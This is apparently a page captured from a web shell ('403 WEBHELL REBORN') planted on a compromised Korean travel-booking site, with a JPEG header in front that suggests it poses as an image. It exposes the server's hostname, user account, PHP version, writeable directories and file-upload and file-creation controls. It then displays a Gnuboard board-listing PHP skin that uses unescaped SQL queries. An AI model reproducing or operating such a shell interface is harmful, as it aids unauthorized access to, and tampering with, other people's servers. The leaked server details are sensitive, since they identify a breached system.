ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/skin/board/ziplinekorea_service/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/skin/board/ziplinekorea_service/list.skin.php
<?
if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가

//http://sir.co.kr/bbs/board.php?bo_table=g4_tiptech&wr_id=11039
//여분필드추가시 wr_번호 
if ($fadmin =='fok') { 
 if ($is_admin =='super') { 
//시작할번호 wr_추가시작할 번호 
$af = $board[bo_8]; 
//마지막번호 생성할 마지막번호+1 
$bf = ($board[bo_9]+1);
for ($di=$af; $di<$bf; $di++) { 
$g4memoup ="ALTER TABLE $g4[write_prefix]$bo_table ADD wr_{$di} VARCHAR(255) NOT NULL"; 
$resultup = @mysql_query($g4memoup) or mysql_error(); 
if ($resultup) { 
  echo "$bo_table 게시판에 wr_{$di} 필드생성 성공 하였습니다<br><br>"; 
} else { 
  echo "$bo_table 게시판에 wr_{$di} 필드가 이미 존재 하거나 생성실패<br><br>"; 
 } 
 } 
 } else { 
 alert_close("관리자만 접근할 수 있습니다.");
 } 
 //exit; 
} 

//여분필드삭제시 
if ($fadmin =='fdel') { 
 if ($is_admin =='super') { 
//필드삭제를 시작할번호 wr_삭제시작 번호 
$adf = $board[bo_8]; 
//필드삭제할 마지막번호 +1 
$bdf = ($board[bo_9]+1);
for ($di=$adf; $di<$bdf; $di++) { 
$g4memoups ="ALTER TABLE $g4[write_prefix]$bo_table DROP wr_{$di}"; 
$resultups = @mysql_query($g4memoups) or mysql_error(); 
if ($resultups) { 
  echo "$bo_table 게시판에 wr_{$di} 필드삭제를 성공 하였습니다<br><br>"; 
} else { 
  echo "$bo_table 게시판에 wr_{$di} 필드가 존재 하지않거나 삭제실패<br><br>"; 
 } 
 } 
 } else { 
 alert_close("관리자만 접근할 수 있습니다.");
 } 
// exit; 
}

//http://www.sir.co.kr/bbs/board.php?bo_table=g4_tiptech&wr_id=10118
if ($delete_smallimg == 1 && !empty($is_admin)){ 

  include_once $g4['admin_path'] . '/admin.lib.php'; 
  rm_rf("$g4[path]/data/file/$board[bo_table]/thumb"); 
  alert("$g4[path]/data/file/$board[bo_table]/thumb 을 삭제하였습니다.", $_SERVER['PHP_SELF'] . '?' . str_replace('delete_smallimg=1&', '', $_SERVER['QUERY_STRING'])); 
}

include_once "$board_skin_path/skin.lib.php";

if ($is_category) {
    $nc_category_option=get_nc_category_option($bo_table, $sca);
}

// 선택옵션으로 인해 셀합치기가 가변적으로 변함
$colspan = 5;

//if ($is_category) $colspan++;
if ($is_checkbox) $colspan++;
if ($is_good) $colspan++;
if ($is_nogood) $colspan++;

// 제목이 두줄로 표시되는 경우 이 코드를 사용해 보세요.
// <nobr style='display:block; overflow:hidden; width:000px;'>제목</nobr>
?>

<style type="text/css">
body, td, p, input, button, textarea, select, .c1 { font-family:Tahoma,굴림; font-size:9pt; color:#222222; line-height: 200%; }

.write_head { height:30px; text-align:center; color:#8492A0; }
.field { border:1px solid #dddddd;  height:20px; padding:4px 0px 0px 5px; }
.field1 { border:1px solid #ccc; }
.table1 { border:1px solid #f1f1f1; }
.w1 { height:30px; background:#fbfbfb; padding:5px 5px 5px 15px; }
.w2 { height:30px; color:#888888; background:#fbfbfb; padding:7px 5px 0px 5px; }
.w3 { height:30px; background:#efefef; padding:5px 5px 5px 10px; }

.w_input { font-family:; font-size:9pt; color:#454545; border-top:1px solid #ababab;  border-bottom:1px solid #dfdfdf; border-left:1px solid #ababab; border-right:1px solid #dfdfdf; height:21px;}
</style>

<!-- 링크 버튼, 검색 -->
<div style="text-align:center;">
<table width="<?=$width?>" height="24" border="0" cellspacing="0" cellpadding="0">
<tr>
<form name="fcategory2" method="get" style="margin:0; padding:0;">
<td><?=$board[bo_7_subj]?> 
<?
$bo_table_location = "./board.php?bo_table=";
?>
	<select name=bo_table2 onchange="location='<?=$bo_table_location?>'+this.value;">
<?
	$arr3 = explode("|",$board[bo_7]);
	$str3 = "";
		for ($i=0; $i<count($arr3); $i++) {
			echo $bsql = "select bo_subject from $g4[board_table] where bo_table='$arr3[$i]'";
			$bsql_result = mysql_query($bsql);
			$bo_subj = mysql_result($bsql_result,0,0);
			if($bo_table == $arr3[$i])	$sel_1 = " selected";
			else	$sel_1 = " ";
			if (trim($arr3[$i]))
				$str3 .= "<option value='$arr3[$i]' $sel_1 >$bo_subj</option>\n";
			}
	echo $str3;
?>
	</select>
</td>
</form>

	</tr>
</table>
</div>

<!-- 분류 셀렉트 박스, 게시물 몇건, 관리자화면 링크 -->
<table width="<?=$width?>" height="24" border="0" cellspacing="0" cellpadding="0">
<tr align="center">
<?php
    $arr = explode("|", $board[bo_category_list]);
    $arr1   = explode("|", $board[bo_10]);
		if(!$sca)
		$str = "
				<td width='3'><img src='$board_skin_path/img/tab_on_left.gif' width='3' height='24'></td>
				<td background='$board_skin_path/img/tab_on_bg.gif' style='padding:4 14 0 14' nowrap>
				<a href='board.php?bo_table=$bo_table'><b>전체</b></a></td>
				<td width='3'><img src='$board_skin_path/img/tab_on_right.gif' width='3' height='24'></td>
				";
		else
				$str = "
				<td width='3'><img src='$board_skin_path/img/tab_off_left.gif' width='3' height='24'></td>
				<td background='$board_skin_path/img/tab_off_bg.gif' style='padding:4 14 0 14' nowrap>
				<a href='board.php?bo_table=$bo_table'>전체</a></td>
				<td width='3'><img src='$board_skin_path/img/tab_off_right.gif' width='3' height='24'></td>
				";
    for ($i=0; $i<count($arr); $i++)
        if (trim($arr[$i])){
            if($arr[$i]==$sca){ 
			    $key    = array_search($sca, $arr);
			    $cate   = explode("^", $arr1[$key]);
			    $subca1 = $cate[0];
				$str .= "
				<td width='3'><img src='$board_skin_path/img/tab_on_left.gif' width='3' height='24'></td>
				<td background='$board_skin_path/img/tab_on_bg.gif' style='padding:4 14 0 14' nowrap>
				<a href='board.php?bo_table=$bo_table&sca=".urlencode($arr[$i])."&sfl=&stx=$subca1&nca=$subca1'><b>$arr[$i]</b></a></td>
				<td width='3'><img src='$board_skin_path/img/tab_on_right.gif' width='3' height='24'></td>
				";
				}else{ 
			    $key    = array_search($arr[$i], $arr);
			    $cate   = explode("^", $arr1[$key]);
			    $subca1=$cate[0];
				$str .= "
				<td width='3'><img src='$board_skin_path/img/tab_off_left.gif' width='3' height='24'></td>
				<td background='$board_skin_path/img/tab_off_bg.gif' style='padding:4 14 0 14' nowrap>
				<a href='board.php?bo_table=$bo_table&sca=".urlencode($arr[$i])."&sfl=wr_10&stx=$subca1&nca=$subca1'>$arr[$i]</a></td>
				<td width='3'><img src='$board_skin_path/img/tab_off_right.gif' width='3' height='24'></td>
				";
				}
			}
	echo $str;
	echo "<td width='100%' height='24' style='background:url($board_skin_path/img/dot_gray.gif) repeat-x bottom'></td>";
?>
</tr>
</table>

<script type="text/JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>

<div style="height:12px; line-height:1px; font-size:1px;">&nbsp;</div>

<!-- 게시판 목록 시작 -->
<table width="<?=$width?>" align=center cellpadding=0 cellspacing=0><tr><td>

<!-- 분류 셀렉트 박스, 게시물 몇건, 관리자화면 링크 -->
<table border=0 width="100%" cellspacing="0" cellpadding="0">
<tr height="25">
    <!--td width="30%">
        <form name="fcategory" method="get" style="margin:0; padding:0;">
        <? if ($is_category) { ?>
        <select name=sca onchange="location='<?=$category_location?>'+this.value;">
        <option value=''>전체</option>
        <?=$category_option?>
        </select>
        <? } ?>
        </form>
    </td-->
    <td align="right">
        <img src="<?=$board_skin_path?>/img/icon_total.gif" align=absmiddle>
        <span style="color:#888888; font-weight:bold;">Total <?=number_format($total_count)?></span>
        <? if ($rss_href) { ?><a href='<?=$rss_href?>'><img src='<?=$board_skin_path?>/img/btn_rss.gif' border=0 align=absmiddle></a><?}?>
        <? if ($admin_href) { ?><a href=<?=$_SERVER['PHP_SELF']?>?delete_smallimg=1&<?=$_SERVER['QUERY_STRING']?>><img src="<?=$board_skin_path?>/img/thumbdel.gif" title="썸네일디렉토리삭제" align="absmiddle"></a>      	
  			<a href="<?=$g4['bbs_path']?>/board.php?bo_table=<?=$board[bo_table]?>&fadmin=fok"><img src="<?=$board_skin_path?>/img/f1.gif" title="필드추가" align="absmiddle"></a>
			<a href="<?=$g4['bbs_path']?>/board.php?bo_table=<?=$board[bo_table]?>&fadmin=fdel"><img src="<?=$board_skin_path?>/img/f2.gif" title="필드삭제" align="absmiddle"></a>
			<a href="<?=$admin_href?>"><img src="<?=$board_skin_path?>/img/btn_admin.gif" title="관리자" align="absmiddle"></a>
        <?}?>
    </td>
</tr>
<tr><td height=5></td></tr>
</table>

<!-- 제목 -->
<form name="fboardlist" method="post" style="margin:0;">
<input type='hidden' name='bo_table' value='<?=$bo_table?>'>
<input type='hidden' name='sfl'  value='<?=$sfl?>'>
<input type='hidden' name='stx'  value='<?=$stx?>'>
<input type='hidden' name='spt'  value='<?=$spt?>'>
<input type='hidden' name='page' value='<?=$page?>'>
<input type='hidden' name='sw'   value=''>

<div style="border:1px solid #ddd; height:34px; background:url(<?=$board_skin_path?>/img/title_bg.gif) repeat-x;">
<table width=100% border=0 cellpadding=0 cellspacing=0 style="font-weight:bold; color:#505050;">
<tr height=34 align=center>
    <td width=50>번호</td>
    <? if ($is_checkbox) { ?><td width=40><input onclick="if (this.checked) all_checked(true); else all_checked(false);" type=checkbox></td><?}?>
    <td>제&nbsp;&nbsp;&nbsp;목</td>
    <td align=left width=110>글쓴이</td>
    <?/**/?><td width=40><?=subject_sort_link('wr_datetime', $qstr2, 1)?>날짜</a></td>
    <!--td width=50><?=subject_sort_link('wr_hit', $qstr2, 1)?>조회</a></td><?/**/?>
    <td width=40>날짜</td>
    <td width=50>조회</td>-->
    <?/*?><td width=40 title='마지막 코멘트 쓴 시간'><?=subject_sort_link('wr_last', $qstr2, 1)?>최근</a></td><?*/?>
    <? if ($is_good) { ?><td width=40><?=subject_sort_link('wr_good', $qstr2, 1)?>추천</a></td><?}?>
    <? if ($is_nogood) { ?><td width=40><?=subject_sort_link('wr_nogood', $qstr2, 1)?>비추천</a></td><?}?>
</tr>
</table>
</div>
<div style="height:3px; background:url(<?=$board_skin_path?>/img/title_shadow.gif) repeat-x; line-height:1px; font-size:1px;"></div>

<table width=100% border=0 cellpadding=0 cellspacing=0>
<!-- 목록 -->
<? for ($i=0; $i<count($list); $i++) { ?>
<tr height=29 align=center> 
    <td width=50>
        <? 
        if ($list[$i][is_notice]) // 공지사항 
            echo "<img src=\"$board_skin_path/img/icon_notice.gif\">";
        else if ($wr_id == $list[$i][wr_id]) // 현재위치
            echo "<span style='font:bold 11px tahoma; color:#E15916;'>{$list[$i][num]}</span>";
        else
            echo "<span style='font:normal 11px tahoma; color:#B3B3B3;'>{$list[$i][num]}</span>";
        ?>
    </td>
    <? if ($is_checkbox) { ?><td width=40><input type=checkbox name=chk_wr_id[] value="<?=$list[$i][wr_id]?>"></td><? } ?>
    <td align=left style='word-break:break-all;'>
        <? 
        echo $nobr_begin;
        echo $list[$i][reply];
        echo $list[$i][icon_reply];
        if ($is_category && $list[$i][ca_name]) { 
            echo "<span class=small><font color=gray>[<a href='{$list[$i][ca_name_href]}'>{$list[$i][ca_name]}</a>]</font></span> ";
        }
        $style = "";
        if ($list[$i][is_notice]) $style = " style='font-weight:bold;'";

        echo "<a href='{$list[$i][href]}' $style>";
        echo $list[$i][subject];
        echo "</a>";

        if ($list[$i][comment_cnt]) 
            echo " <a href=\"{$list[$i][comment_href]}\"><span style='font-family:Tahoma;font-size:10px;color:#EE5A00;'>{$list[$i][comment_cnt]}</span></a>";

        // if ($list[$i]['link']['count']) { echo "[{$list[$i]['link']['count']}]"; }
        // if ($list[$i]['file']['count']) { echo "<{$list[$i]['file']['count']}>"; }

        echo " " . $list[$i][icon_new];
        echo " " . $list[$i][icon_file];
        echo " " . $list[$i][icon_link];
        echo " " . $list[$i][icon_hot];
        echo " " . $list[$i][icon_secret];
        echo $nobr_end;
        ?>
    </td>
    <td align=left width=110><nobr style='display:block; overflow:hidden; width:105px;'><?=$list[$i][name]?></nobr></td>
    <td width=40><span style='font:normal 11px tahoma; color:#BABABA;'><?=$list[$i][datetime2]?></span></td>
    <!--td width=50><span style='font:normal 11px tahoma; color:#BABABA;'><?=$list[$i][wr_hit]?></span></td-->
    <?/*?><td width=40><span style='font:normal 11px tahoma; color:#BABABA;'><?=$list[$i][last2]?></span></td><?*/?>
    <? if ($is_good) { ?><td align="center" width=40><span style='font:normal 11px tahoma; color:#BABABA;'><?=$list[$i][wr_good]?></span></td><? } ?>
    <? if ($is_nogood) { ?><td align="center" width=40><span style='font:normal 11px tahoma; color:#BABABA;'><?=$list[$i][wr_nogood]?></span></td><? } ?>
</tr>
<tr><td colspan=<?=$colspan?> height=1 bgcolor=#eeeeee></td></tr>
<?}?>
<? if (count($list) == 0) { echo "<tr><td colspan='$colspan' height=100 align=center>게시물이 없습니다.</td></tr>"; } ?>
</table>
</form>


<div style="clear:both; margin-top:7px; height:31px;">
    <div style="float:left;">
    <? if ($list_href) { ?>
    <a href="<?=$list_href?>"><img src="<?=$board_skin_path?>/img/btn_list.gif" align=absmiddle></a>
    <? } ?>
    <? if ($is_checkbox) { ?>
    <a href="javascript:select_delete();"><img src="<?=$board_skin_path?>/img/btn_select_delete.gif" align=absmiddle></a>
    <a href="javascript:select_copy('copy');"><img src="<?=$board_skin_path?>/img/btn_select_copy.gif" align=absmiddle></a>
    <a href="javascript:select_copy('move');"><img src="<?=$board_skin_path?>/img/btn_select_move.gif" align=absmiddle></a>
    <? } ?>
    </div>

    <div style="float:right;">
    <? if ($write_href) { ?><a href="<?=$write_href?>"><img src="<?=$board_skin_path?>/img/btn_write.gif" border="0"></a><? } ?>
    </div>
</div>

<div style="height:1px; line-height:1px; font-size:1px; background-color:#eee; clear:both;">&nbsp;</div>
<div style="height:1px; line-height:1px; font-size:1px; background-color:#ddd; clear:both;">&nbsp;</div>

<!-- 페이지 -->
<div style="text-align:center; line-height:30px; clear:both; margin:5px 0 10px 0; padding:5px 0; font-family:gulim;">

    <? if ($prev_part_href) { echo "<a href='$prev_part_href'><img src='$board_skin_path/img/page_search_prev.gif' border=0 align=absmiddle title='이전검색'></a>"; } ?>
    <?
    // 기본으로 넘어오는 페이지를 아래와 같이 변환하여 이미지로도 출력할 수 있습니다.
    //echo $write_pages;
    $write_pages = str_replace("처음", "<img src='$board_skin_path/img/page_begin.gif' border='0' align='absmiddle' title='처음'>", $write_pages);
    $write_pages = str_replace("이전", "<img src='$board_skin_path/img/page_prev.gif' border='0' align='absmiddle' title='이전'>", $write_pages);
    $write_pages = str_replace("다음", "<img src='$board_skin_path/img/page_next.gif' border='0' align='absmiddle' title='다음'>", $write_pages);
    $write_pages = str_replace("맨끝", "<img src='$board_skin_path/img/page_end.gif' border='0' align='absmiddle' title='맨끝'>", $write_pages);
    $write_pages = preg_replace("/<span>([0-9]*)<\/span>/", "<b><span style=\"color:#B3B3B3; font-size:12px;\">$1</span></b>", $write_pages);
    $write_pages = preg_replace("/<b>([0-9]*)<\/b>/", "<b><span style=\"color:#4D6185; font-size:12px; text-decoration:underline;\">$1</span></b>", $write_pages);
    ?>
    <?=$write_pages?>
    <? if ($next_part_href) { echo "<a href='$next_part_href'><img src='$board_skin_path/img/page_search_next.gif' border=0 align=absmiddle title='다음검색'></a>"; } ?>

</div>
<!---검색시작-->
<div style="text-align:center;">
<form name=fsearch method=get style="margin:0px;">
<input type=hidden name=bo_table value="<?=$bo_table?>">
<input type=hidden name=sca      value="<?=$sca?>">
<select name=sfl style="background-color:#f6f6f6; border:1px solid #7f9db9; height:21px;">
    <option value='wr_subject||wr_content||wr_name'>전체</option>
    <option value='wr_name,1'>이름</option>
    <option value='wr_subject'>제목</option>
    <option value='wr_content'>내용</option>
</select>
<input name=stx maxlength=15 itemname="검색어" required value='<?=$stx?>' style="width:100px; background-color:#f6f6f6; border:1px solid #7f9db9; height:21px;">
<input type=image src="<?=$board_skin_path?>/img/btn_search.gif" border=0 align=absmiddle>
<input type=radio name=sop value=and>and
<input type=radio name=sop value=or>or
</form>
</div>
<!----검색 끝--->
</td></tr></table>

<script language="JavaScript">
//if ('<?=$sca?>') document.fcategory.sca.value = '<?=$sca?>';
if ('<?=$stx?>') {
    document.fsearch.sfl.value = '<?=$sfl?>';

    if ('<?=$sop?>' == 'and') 
        document.fsearch.sop[0].checked = true;

    if ('<?=$sop?>' == 'or')
        document.fsearch.sop[1].checked = true;
} else {
    document.fsearch.sop[0].checked = true;
}
</script>

<? if ($is_checkbox) { ?>
<script language="JavaScript">
function all_checked(sw) {
    var f = document.fboardlist;

    for (var i=0; i<f.length; i++) {
        if (f.elements[i].name == "chk_wr_id[]")
            f.elements[i].checked = sw;
    }
}

function check_confirm(str) {
    var f = document.fboardlist;
    var chk_count = 0;

    for (var i=0; i<f.length; i++) {
        if (f.elements[i].name == "chk_wr_id[]" && f.elements[i].checked)
            chk_count++;
    }

    if (!chk_count) {
        alert(str + "할 게시물을 하나 이상 선택하세요.");
        return false;
    }
    return true;
}

// 선택한 게시물 삭제
function select_delete() {
    var f = document.fboardlist;

    str = "삭제";
    if (!check_confirm(str))
        return;

    if (!confirm("선택한 게시물을 정말 "+str+" 하시겠습니까?\n\n한번 "+str+"한 자료는 복구할 수 없습니다"))
        return;

    f.action = "./delete_all.php";
    f.submit();
}

// 선택한 게시물 복사 및 이동
function select_copy(sw) {
    var f = document.fboardlist;

    if (sw == "copy")
        str = "복사";
    else
        str = "이동";
                       
    if (!check_confirm(str))
        return;

    var sub_win = window.open("", "move", "left=50, top=50, width=500, height=550, scrollbars=1");

    f.sw.value = sw;
    f.target = "move";
    f.action = "./move.php";
    f.submit();
}
</script>
<? } ?>
<!-- 게시판 목록 끝 -->

Anon7 - 2021